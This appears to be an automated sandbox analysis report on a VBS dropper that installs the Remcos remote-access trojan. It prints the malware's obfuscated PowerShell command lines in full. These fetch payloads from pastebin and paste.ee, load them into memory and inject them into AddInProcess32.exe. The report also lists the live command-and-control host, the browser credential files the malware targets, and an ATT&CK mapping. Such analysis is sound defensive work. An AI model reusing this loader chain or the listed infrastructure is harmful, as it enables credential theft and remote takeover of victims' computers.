$jdbfk, '1', 'Roda' ));"Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\PING.EXE "C:\Windows\system32\PING.EXE" 127.0.0.1
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -encodedCommand JABmACAAPQAgACgAWwBTAHkAcwB0AGUAbQAuAEkATwAuAFAAYQB0AGgAXQA6ADoARwBlAHQAVABlAG0AcABQAGEAdABoACgAKQAgACsAIAAnAGQAbABsADAAMQAuAHQAeAB0ACcAKQAgADsAJABRAFAAdABhAHYAIAA9ACAAKAAgAEcAZQB0AC0AQwBvAG4AdABlAG4AdAAgAC0AUABhAHQAaAAgACQAZgAgACkAIAA7AEkAbgB2AG8AawBlAC0AVwBlAGIAUgBlAHEAdQBlAHMAdAAgAC0AVQBSAEkAIAAkAFEAUAB0AGEAdgAgAC0ATwB1AHQARgBpAGwAZQAgACQAZgAgAC0AVQBzAGUAQgBhAHMAaQBjAFAAYQByAHMAaQBuAGcA -inputFormat xml -outputFormat textJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
                    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" $iujujjzz = 'wwbt?hk?cwb0?gu?bq?u?e4?zqb0?c4?uwbl?hi?dgbp?gm?zqbq?g8?aqbu?hq?tqbh?g4?yqbn?gu?cgbd?do?ogbt?gu?ywb1?hi?aqb0?hk?u?by?g8?d?bv?gm?bwbs?c??pq?g?fs?uwb5?hm?d?bl?g0?lgbo?gu?d??u?fm?zqbj?hu?cgbp?hq?eqbq?hi?bwb0?g8?ywbv?gw?v?b5?h??zqbd?do?ogbu?gw?cw?x?di?ow?k?em?qwbs?gg?bq?g?d0?i??n?gg?d?b0?h??cw?6?c8?lwbw?ge?cwb0?gu?ygbp?g4?lgbj?g8?bq?v?hi?yqb3?c8?sg?2?hu?ugbq?fo?cgb2?cc?i??7?cq?zg?g?d0?i??o?fs?uwb5?hm?d?bl?g0?lgbj?e8?lgbq?ge?d?bo?f0?og?6?ec?zqb0?fq?zqbt?h??u?bh?hq?a??o?ck?i??r?c??jwbk?gw?b??w?de?lgb0?hg?d??n?ck?i??7?ek?bgb2?g8?awbl?c0?vwbl?gi?ugbl?he?dqbl?hm?d??g?c0?vqbs?ek?i??k?em?qwbs?gg?bq?g?c0?twb1?hq?rgbp?gw?zq?g?cq?zg?g?c0?vqbz?gu?qgbh?hm?aqbj?f??yqby?hm?aqbu?gc?i??7?gm?bqbk?c4?zqb4?gu?i??v?gm?i??7?h??aqbu?gc?i??x?di?nw?u?d??lg?w?c4?mq?g?ds?c?bv?hc?zqby?hm?a?bl?gw?b??u?gu?e?bl?c??lqbj?g8?bqbt?ge?bgbk?c??ew?k?gy?i??9?c??k?bb?fm?eqbz?hq?zqbt?c4?sqbp?c4?u?bh?hq?a?bd?do?ogbh?gu?d?bu?gu?bqbw?f??yqb0?gg?k??p?c??kw?g?cc?z?bs?gw?m??x?c4?d?b4?hq?jw?p?c??ow?k?fe?u?b0?ge?dg?g?d0?i??o?c??rwbl?hq?lqbd?g8?bgb0?gu?bgb0?c??lqbq?ge?d?bo?c??j?bm?c??kq?g?ds?sqbu?hy?bwbr?gu?lqbx?gu?ygbs?gu?cqb1?gu?cwb0?c??lqbv?fi?sq?g?cq?uqbq?hq?yqb2?c??lqbp?hu?d?bg?gk?b?bl?c??j?bm?c??lqbv?hm?zqbc?ge?cwbp?gm?u?bh?hi?cwbp?g4?zwb9?c??ow?k?fe?u?b0?ge?dg?g?d0?i??o?c??rwbl?hq?lqbd?g8?bgb0?gu?bgb0?c??lqbq?ge?d?bo?c??j?bm?c??kq?g?ds?j?bq?gq?ygbm?gs?i??9?c??jw?w?cc?i??7?cq?zqb2?g8?bqbu?c??pq?g?cc?jqbk?gs?uqbh?hm?r?bm?gc?cgbu?gc?jq?n?c??owbb?ei?eqb0?gu?wwbd?f0?i??k?gq?d?b2?gu?yg?g?d0?i?bb?hm?eqbz?hq?zqbt?c4?qwbv?g4?dgbl?hi?d?bd?do?ogbg?hi?bwbt?ei?yqbz?gu?ng?0?fm?d?by?gk?bgbn?cg?i??k?fe?u?b0?ge?dg?u?hi?zqbw?gw?yqbj?gu?k??n?cq?j??n?cw?jwbb?cc?kq?g?ck?i??7?fs?uwb5?hm?d?bl?g0?lgbb?h??c?be?g8?bqbh?gk?bgbd?do?ogbd?hu?cgby?gu?bgb0?eq?bwbt?ge?aqbu?c4?t?bv?ge?z??o?cq?z?b0?hy?zqbi?ck?lgbh?gu?d?bu?hk?c?bl?cg?jwbu?gu?a
?b1?gw?ywbo?gu?cwby?hg?w?b4?hg?lgbd?gw?yqbz?hm?mq?n?ck?lgbh?gu?d?bn?gu?d?bo?g8?z??o?cc?tqbz?he?qgbj?gi?wq?n?ck?lgbj?g4?dgbv?gs?zq?o?cq?bgb1?gw?b??s?c??wwbv?gi?agbl?gm?d?bb?f0?xq?g?cg?jw?w?c8?zg?y?gs?cgbs?c8?z??v?gu?zq?u?gu?d?bz?ge?c??v?c8?ogbz?h??d?b0?gg?jw?g?cw?i??k?gu?dgbv?g0?bg?g?cw?i??n?f8?xwbf?f8?xwbf?f8?xwbf?f8?xwbf?f8?xwbf?f8?xwbf?f8?xwbf?f8?xwbf?f8?xwbf?f8?xwbf?f8?xwbf?f8?xwbf?f8?xwbf?f8?xwbf?f8?xw?t?c0?lq?t?c0?lq?t?cc?l??g?cq?agbk?gi?zgbr?cw?i??n?de?jw?s?c??jwbs?g8?z?bh?cc?i??p?ck?ow?=';$yolopolhggobek = [system.text.encoding]::unicode.getstring( [system.convert]::frombase64string( $iujujjzz.replace('?','a') ) );$yolopolhggobek = $yolopolhggobek.replace('%jkqasdfgrtg%', 'c:\users\user\desktop\asegurar.vbs');powershell $yolopolhggobek;
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" "[system.net.servicepointmanager]::securityprotocol = [system.net.securityprotocoltype]::tls12;$ccrhm = 'https://pastebin.com/raw/j6urjzrv' ;$f = ([system.io.path]::gettemppath() + 'dll01.txt') ;invoke-webrequest -uri $ccrhm -outfile $f -usebasicparsing ;cmd.exe /c ;ping 127.0.0.1 ;powershell.exe -command {$f = ([system.io.path]::gettemppath() + 'dll01.txt') ;$qptav = ( get-content -path $f ) ;invoke-webrequest -uri $qptav -outfile $f -usebasicparsing} ;$qptav = ( get-content -path $f ) ;$jdbfk = '0' ;$evomn = 'c:\users\user\desktop\asegurar.vbs' ;[byte[]] $dtveb = [system.convert]::frombase64string( $qptav.replace('$$','a') ) ;[system.appdomain]::currentdomain.load($dtveb).gettype('tehulchesxxxxx.class1').getmethod('msqbiby').invoke($null, [object[]] ('0/f2krr/d/ee.etsap//:sptth' , $evomn , '____________________________________________-------', $jdbfk, '1', 'roda' ));"
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -encodedcommand jabmacaapqagacgawwbtahkacwb0aguabqauaekatwauafaayqb0aggaxqa6adoarwblahqavablag0acabqageadaboacgakqagacsaiaanagqababsadaamqauahqaeab0accakqagadsajabrafaadabhahyaiaa9acaakaagaecazqb0ac0aqwbvag4adablag4adaagac0auabhahqaaaagacqazgagackaiaa7aekabgb2ag8aawblac0avwblagiaugblaheadqblahmadaagac0avqbsaekaiaakafeauab0ageadgagac0atwb1ahqargbpagwazqagacqazgagac0avqbzaguaqgbhahmaaqbjafaayqbyahmaaqbuagca -inputformat xml -outputformat text
                    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" $iujujjzz = 'wwbt?hk?cwb0?gu?bq?u?e4?zqb0?c4?uwbl?hi?dgbp?gm?zqbq?g8?aqbu?hq?tqbh?g4?yqbn?gu?cgbd?do?ogbt?gu?ywb1?hi?aqb0?hk?u?by?g8?d?bv?gm?bwbs?c??pq?g?fs?uwb5?hm?d?bl?g0?lgbo?gu?d??u?fm?zqbj?hu?cgbp?hq?eqbq?hi?bwb0?g8?ywbv?gw?v?b5?h??zqbd?do?ogbu?gw?cw?x?di?ow?k?em?qwbs?gg?bq?g?d0?i??n?gg?d?b0?h??cw?6?c8?lwbw?ge?cwb0?gu?ygbp?g4?lgbj?g8?bq?v?hi?yqb3?c8?sg?2?hu?ugbq?fo?cgb2?cc?i??7?cq?zg?g?d0?i??o?fs?uwb5?hm?d?bl?g0?lgbj?e8?lgbq?ge?d?bo?f0?og?6?ec?zqb0?fq?zqbt?h??u?bh?hq?a??o?ck?i??r?c??jwbk?gw?b??w?de?lgb0?hg?d??n?ck?i??7?ek?bgb2?g8?awbl?c0?vwbl?gi?ugbl?he?dqbl?hm?d??g?c0?vqbs?ek?i??k?em?qwbs?gg?bq?g?c0?twb1?hq?rgbp?gw?zq?g?cq?zg?g?c0?vqbz?gu?qgbh?hm?aqbj?f??yqby?hm?aqbu?gc?i??7?gm?bqbk?c4?zqb4?gu?i??v?gm?i??7?h??aqbu?gc?i??x?di?nw?u?d??lg?w?c4?mq?g?ds?c?bv?hc?zqby?hm?a?bl?gw?b??u?gu?e?bl?c??lqbj?g8?bqbt?ge?bgbk?c??ew?k?gy?i??9?c??k?bb?fm?eqbz?hq?zqbt?c4?sqbp?c4?u?bh?hq?a?bd?do?ogbh?gu?d?bu?gu?bqbw?f??yqb0?gg?k??p?c??kw?g?cc?z?bs?gw?m??x?c4?d?b4?hq?jw?p?c??ow?k?fe?u?b0?ge?dg?g?d0?i??o?c??rwbl?hq?lqbd?g8?bgb0?gu?bgb0?c??lqbq?ge?d?bo?c??j?bm?c??kq?g?ds?sqbu?hy?bwbr?gu?lqbx?gu?ygbs?gu?cqb1?gu?cwb0?c??lqbv?fi?sq?g?cq?uqbq?hq?yqb2?c??lqbp?hu?d?bg?gk?b?bl?c??j?bm?c??lqbv?hm?zqbc?ge?cwbp?gm?u?bh?hi?cwbp?g4?zwb9?c??ow?k?fe?u?b0?ge?dg?g?d0?i??o?c??rwbl?hq?lqbd?g8?bgb0?gu?bgb0?c??lqbq?ge?d?bo?c??j?bm?c??kq?g?ds?j?bq?gq?ygbm?gs?i??9?c??jw?w?cc?i??7?cq?zqb2?g8?bqbu?c??pq?g?cc?jqbk?gs?uqbh?hm?r?bm?gc?cgbu?gc?jq?n?c??owbb?ei?eqb0?gu?wwbd?f0?i??k?gq?d?b2?gu?yg?g?d0?i?bb?hm?eqbz?hq?zqbt?c4?qwbv?g4?dgbl?hi?d?bd?do?ogbg?hi?bwbt?ei?yqbz?gu?ng?0?fm?d?by?gk?bgbn?cg?i??k?fe?u?b0?ge?dg?u?hi?zqbw?gw?yqbj?gu?k??n?cq?j??n?cw?jwbb?cc?kq?g?ck?i??7?fs?uwb5?hm?d?bl?g0?lgbb?h??c?be?g8?bqbh?gk?bgbd?do?ogbd?hu?cgby?gu?bgb0?eq?bwbt?ge?aqbu?c4?t?bv?ge?z??o?cq?z?b0?hy?zqbi?ck?lgbh?gu?d?bu?hk?c?bl?cg?jwbu?gu?a
?b1?gw?ywbo?gu?cwby?hg?w?b4?hg?lgbd?gw?yqbz?hm?mq?n?ck?lgbh?gu?d?bn?gu?d?bo?g8?z??o?cc?tqbz?he?qgbj?gi?wq?n?ck?lgbj?g4?dgbv?gs?zq?o?cq?bgb1?gw?b??s?c??wwbv?gi?agbl?gm?d?bb?f0?xq?g?cg?jw?w?c8?zg?y?gs?cgbs?c8?z??v?gu?zq?u?gu?d?bz?ge?c??v?c8?ogbz?h??d?b0?gg?jw?g?cw?i??k?gu?dgbv?g0?bg?g?cw?i??n?f8?xwbf?f8?xwbf?f8?xwbf?f8?xwbf?f8?xwbf?f8?xwbf?f8?xwbf?f8?xwbf?f8?xwbf?f8?xwbf?f8?xwbf?f8?xwbf?f8?xwbf?f8?xwbf?f8?xw?t?c0?lq?t?c0?lq?t?cc?l??g?cq?agbk?gi?zgbr?cw?i??n?de?jw?s?c??jwbs?g8?z?bh?cc?i??p?ck?ow?=';$yolopolhggobek = [system.text.encoding]::unicode.getstring( [system.convert]::frombase64string( $iujujjzz.replace('?','a') ) );$yolopolhggobek = $yolopolhggobek.replace('%jkqasdfgrtg%', 'c:\users\user\desktop\asegurar.vbs');powershell $yolopolhggobek;Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" "[system.net.servicepointmanager]::securityprotocol = [system.net.securityprotocoltype]::tls12;$ccrhm = 'https://pastebin.com/raw/j6urjzrv' ;$f = ([system.io.path]::gettemppath() + 'dll01.txt') ;invoke-webrequest -uri $ccrhm -outfile $f -usebasicparsing ;cmd.exe /c ;ping 127.0.0.1 ;powershell.exe -command {$f = ([system.io.path]::gettemppath() + 'dll01.txt') ;$qptav = ( get-content -path $f ) ;invoke-webrequest -uri $qptav -outfile $f -usebasicparsing} ;$qptav = ( get-content -path $f ) ;$jdbfk = '0' ;$evomn = 'c:\users\user\desktop\asegurar.vbs' ;[byte[]] $dtveb = [system.convert]::frombase64string( $qptav.replace('$$','a') ) ;[system.appdomain]::currentdomain.load($dtveb).gettype('tehulchesxxxxx.class1').getmethod('msqbiby').invoke($null, [object[]] ('0/f2krr/d/ee.etsap//:sptth' , $evomn , '____________________________________________-------', $jdbfk, '1', 'roda' ));"Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -encodedcommand jabmacaapqagacgawwbtahkacwb0aguabqauaekatwauafaayqb0aggaxqa6adoarwblahqavablag0acabqageadaboacgakqagacsaiaanagqababsadaamqauahqaeab0accakqagadsajabrafaadabhahyaiaa9acaakaagaecazqb0ac0aqwbvag4adablag4adaagac0auabhahqaaaagacqazgagackaiaa7aekabgb2ag8aawblac0avwblagiaugblaheadqblahmadaagac0avqbsaekaiaakafeauab0ageadgagac0atwb1ahqargbpagwazqagacqazgagac0avqbzaguaqgbhahmaaqbjafaayqbyahmaaqbuagca -inputformat xml -outputformat textJump to behavior
                    Source: AddInProcess32.exe, 00000008.00000002.2961016698.0000000000F38000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program ManagerJ0\001
                    Source: AddInProcess32.exe, 00000008.00000002.2961016698.0000000000F38000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program ManagerJ0\001Op
                    Source: AddInProcess32.exe, 00000008.00000002.2961016698.0000000000F38000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Manager
                    Source: AddInProcess32.exe, 00000008.00000002.2961016698.0000000000F38000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Managerd
                    Source: AddInProcess32.exe, 00000008.00000002.2961016698.0000000000F38000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program ManagerJ0\GB
                    Source: AddInProcess32.exe, 00000008.00000002.2961016698.0000000000F38000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program ManagerJ0\
                    Source: AddInProcess32.exe, 00000008.00000002.2961016698.0000000000F38000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Managerns.org:20014p
                    Source: AddInProcess32.exe, 00000008.00000002.2961016698.0000000000F38000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Managers|
                    Source: AddInProcess32.exe, 00000008.00000002.2961016698.0000000000F38000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program ManagerJ0\001?ptK
                    Source: AddInProcess32.exe, 00000008.00000002.2961016698.0000000000F38000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program ManagerJ0\8
                    Source: AddInProcess32.exe, 00000008.00000002.2961016698.0000000000F38000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: |Program Manager|
                    Source: AddInProcess32.exe, 00000008.00000002.2961016698.0000000000F38000.00000004.00000020.00020000.00000000.sdmp, logs.dat.8.drBinary or memory string: [Program Manager]
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 8_2_00434CB6 cpuid 8_2_00434CB6
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: GetLocaleInfoA,8_2_0040F90C
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: EnumSystemLocalesW,8_2_0045201B
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: EnumSystemLocalesW,8_2_004520B6
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,8_2_00452143
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: GetLocaleInfoW,8_2_00452393
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: EnumSystemLocalesW,8_2_00448484
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,8_2_004524BC
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: GetLocaleInfoW,8_2_004525C3
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,8_2_00452690
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: GetLocaleInfoW,8_2_0044896D
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW,8_2_00451D58
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: EnumSystemLocalesW,8_2_00451FD0
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 8_2_00404F51 GetLocalTime,CreateEventA,CreateThread,8_2_00404F51
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 8_2_0041B69E GetComputerNameExW,GetUserNameW,8_2_0041B69E
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 8_2_0044942D _free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,8_2_0044942D
Source: C:\Windows\System32\wscript.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

                    Stealing of Sensitive Information

Source: Yara match, file source: 8.2.AddInProcess32.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match, file source: 8.2.AddInProcess32.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match, file source: 3.2.powershell.exe.260356ab680.4.unpack, type: UNPACKEDPE
Source: Yara match, file source: 3.2.powershell.exe.260356ab680.4.raw.unpack, type: UNPACKEDPE
Source: Yara match, file source: 00000008.00000002.2961914920.0000000002C1E000.00000004.00000010.00020000.00000000.sdmp, type: MEMORY
Source: Yara match, file source: 00000008.00000002.2961016698.0000000000F38000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match, file source: 00000008.00000002.2959285882.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match, file source: 00000003.00000002.1927741950.0000026035520000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match, file source: 00000003.00000002.1927741950.0000026035581000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match, file source: Process Memory Space: powershell.exe PID: 980, type: MEMORYSTR
Source: Yara match, file source: Process Memory Space: AddInProcess32.exe PID: 7372, type: MEMORYSTR
Source: Yara match, file source: C:\ProgramData\remcos\logs.dat, type: DROPPED
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Code function: \AppData\Local\Google\Chrome\User Data\Default\Login Data 8_2_0040BA4D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Code function: \AppData\Roaming\Mozilla\Firefox\Profiles\ 8_2_0040BB6B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Code function: \key3.db 8_2_0040BB6B

                    Remote Access Functionality

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Mutex created: \Sessions\1\BaseNamedObjects\Rmc-T0UVJ0
Source: Yara match, file source: 8.2.AddInProcess32.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match, file source: 8.2.AddInProcess32.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match, file source: 3.2.powershell.exe.260356ab680.4.unpack, type: UNPACKEDPE
Source: Yara match, file source: 3.2.powershell.exe.260356ab680.4.raw.unpack, type: UNPACKEDPE
Source: Yara match, file source: 00000008.00000002.2961914920.0000000002C1E000.00000004.00000010.00020000.00000000.sdmp, type: MEMORY
Source: Yara match, file source: 00000008.00000002.2961016698.0000000000F38000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match, file source: 00000008.00000002.2959285882.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match, file source: 00000003.00000002.1927741950.0000026035520000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match, file source: 00000003.00000002.1927741950.0000026035581000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match, file source: Process Memory Space: powershell.exe PID: 980, type: MEMORYSTR
Source: Yara match, file source: Process Memory Space: AddInProcess32.exe PID: 7372, type: MEMORYSTR
Source: Yara match, file source: C:\ProgramData\remcos\logs.dat, type: DROPPED
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Code function: cmd.exe 8_2_0040569A
MITRE ATT&CK Matrix (interactive matrix flattened by extraction; only the techniques carrying a signature count badge are listed, grouped by tactic column, with the badge value reproduced exactly as extracted):

• Resource Development: Scripting (121)
• Execution: Native API (1), Exploitation for Client Execution (1), Command and Scripting Interpreter (3), Service Execution (2), PowerShell (3)
• Persistence: Scripting (121), DLL Side-Loading (1), Windows Service (1)
• Privilege Escalation: DLL Side-Loading (1), Bypass User Account Control (1), Access Token Manipulation (1), Windows Service (1), Process Injection (222)
• Defense Evasion: Deobfuscate/Decode Files or Information (111), Obfuscated Files or Information (4), Software Packing (1), DLL Side-Loading (1), Bypass User Account Control (1), Masquerading (1), Virtualization/Sandbox Evasion (31), Access Token Manipulation (1), Process Injection (222)
• Credential Access: OS Credential Dumping (1), Input Capture (211), Credentials In Files (2)
• Discovery: System Time Discovery (2), Account Discovery (1), System Service Discovery (1), File and Directory Discovery (3), System Information Discovery (33), Security Software Discovery (21), Virtualization/Sandbox Evasion (31), Process Discovery (3), Application Window Discovery (1), System Owner/User Discovery (1), Remote System Discovery (1), System Network Configuration Discovery (1)
• Collection: Archive Collected Data (12), Input Capture (211), Clipboard Data (3)
• Command and Control: Web Service (1), Ingress Tool Transfer (12), Encrypted Channel (21), Non-Standard Port (1), Remote Access Software (1), Non-Application Layer Protocol (2), Application Layer Protocol (213)
• Impact: System Shutdown/Reboot (1), Defacement (1)

No technique in the Reconnaissance, Initial Access, Lateral Movement or Exfiltration columns carries a badge.
Behavior Graph (interactive graph not reproduced; Behavior Graph ID: 1545852, Sample: asegurar.vbs, Start date: 31/10/2024, Architecture: WINDOWS, Score: 100). The process chain and annotations recoverable from the graph:

• Root: contacts sost.duckdns.org, pastebin.com and 2 other IPs or domains; signatures: Suricata IDS alerts for network traffic, Found malware configuration, Malicious sample detected (through community Yara rule), 17 other signatures; Uses dynamic DNS services (sost.duckdns.org); Connects to a pastebin service (likely for C&C) (pastebin.com)
• wscript.exe (started from the sample): Suspicious powershell command line found; Wscript starts Powershell (via cmd or directly); Windows Scripting host queries suspicious COM object (likely to drop second stage); Suspicious execution chain found
• powershell.exe (child of wscript.exe): Suspicious powershell command line found; Encrypted powershell cmdline option found; Uses ping.exe to check the status of other devices and networks; Found suspicious powershell code related to unpacking or dynamic code loading; starts powershell.exe and conhost.exe
• powershell.exe (second stage): contacts pastebin.com 104.20.3.235 port 443 (local ports 49730, 49732; CLOUDFLARENETUS, United States) and paste.ee 188.114.97.3 port 443 (local port 49736; CLOUDFLARENETUS, European Union); Encrypted powershell cmdline option found; Writes to foreign memory regions; Potential dropper URLs found in powershell memory; Injects a PE file into a foreign processes; starts AddInProcess32.exe, PING.EXE, powershell.exe and cmd.exe
• AddInProcess32.exe: contacts sost.duckdns.org 181.236.112.169 port 2001 (local ports 49741, 49742; COLOMBIATELECOMUNICACIONESSAESPCO, Colombia); drops C:\ProgramData\remcos\logs.dat (data); Contains functionality to bypass UAC (CMSTPLUA); Detected Remcos RAT; Contains functionality to change the wallpaper; 5 other signatures
• PING.EXE: 127.0.0.1 (unknown, unknown)
• powershell.exe (third): contacts rentry.org 164.132.58.105 port 443 (local ports 49731, 49733; OVHFR, France)

Antivirus detection for the sample (Source, Detection, Scanner, Label):
• asegurar.vbs: 16%, ReversingLabs, Win32.Trojan.Honolulu
No Antivirus matches
No Antivirus matches

Antivirus detection for contacted domains (Source, Detection, Scanner):
• paste.ee: 1%, Virustotal
• sost.duckdns.org: 0%, Virustotal
• rentry.org: 0%, Virustotal
• pastebin.com: 0%, Virustotal

Antivirus detection for URLs found in memory (Source, Detection, Scanner, Label):
• http://nuget.org/NuGet.exe: 0%, URL Reputation, safe
• http://pesterbdd.com/images/Pester.png: 0%, URL Reputation, safe
• https://go.micro: 0%, URL Reputation, safe
• https://contoso.com/License: 0%, URL Reputation, safe
• https://contoso.com/Icon: 0%, URL Reputation, safe
• https://aka.ms/pscore6: 0%, URL Reputation, safe
• http://geoplugin.net/json.gp: 0%, URL Reputation, safe
• http://geoplugin.net/json.gp/C: 0%, URL Reputation, safe
• https://contoso.com/: 0%, URL Reputation, safe
• https://nuget.org/nuget.exe: 0%, URL Reputation, safe
• https://aka.ms/pscore68: 0%, URL Reputation, safe
• http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name: 0%, URL Reputation, safe
Contacted domains (Name, IP, Active, Malicious, Reputation):
• paste.ee, 188.114.97.3, active: true, malicious: true, reputation: unknown
• sost.duckdns.org, 181.236.112.169, active: true, malicious: true, reputation: unknown
• rentry.org, 164.132.58.105, active: true, malicious: false, reputation: unknown
• pastebin.com, 104.20.3.235, active: true, malicious: true, reputation: unknown

Contacted URLs (Name, Malicious, Reputation):
• https://rentry.org/vsm4ofxs/raw, malicious: false, reputation: unknown
• https://paste.ee/d/Rrk2f/0, malicious: true, reputation: unknown
• https://pastebin.com/raw/J6uRjZrv, malicious: true, reputation: unknown
• https://rentry.org/shqm6g9p/raw, malicious: false, reputation: unknown
• sost.duckdns.org, malicious: true, reputation: unknown
• https://pastebin.com/raw/4B83LcVU, malicious: false, reputation: unknown
URLs found in process memory (Name, Source, Malicious, Antivirus Detection, Reputation):
• http://nuget.org/NuGet.exe (source: powershell.exe, 00000003.00000002.1927741950.0000026035581000.00000004.00000800.00020000.00000000.sdmp; powershell.exe, 00000006.00000002.1786360295.00000201819E4000.00000004.00000800.00020000.00000000.sdmp; powershell.exe, 00000006.00000002.1798573819.00000201901B4000.00000004.00000800.00020000.00000000.sdmp; powershell.exe, 00000006.00000002.1798573819.0000020190072000.00000004.00000800.00020000.00000000.sdmp); malicious: false; URL Reputation: safe; reputation: unknown
• http://pesterbdd.com/images/Pester.png (source: powershell.exe, 00000006.00000002.1786360295.000002018022D000.00000004.00000800.00020000.00000000.sdmp); malicious: false; URL Reputation: safe; reputation: unknown
• http://paste.ee (source: powershell.exe, 00000003.00000002.1886765737.0000026025AD5000.00000004.00000800.00020000.00000000.sdmp); malicious: false; reputation: unknown
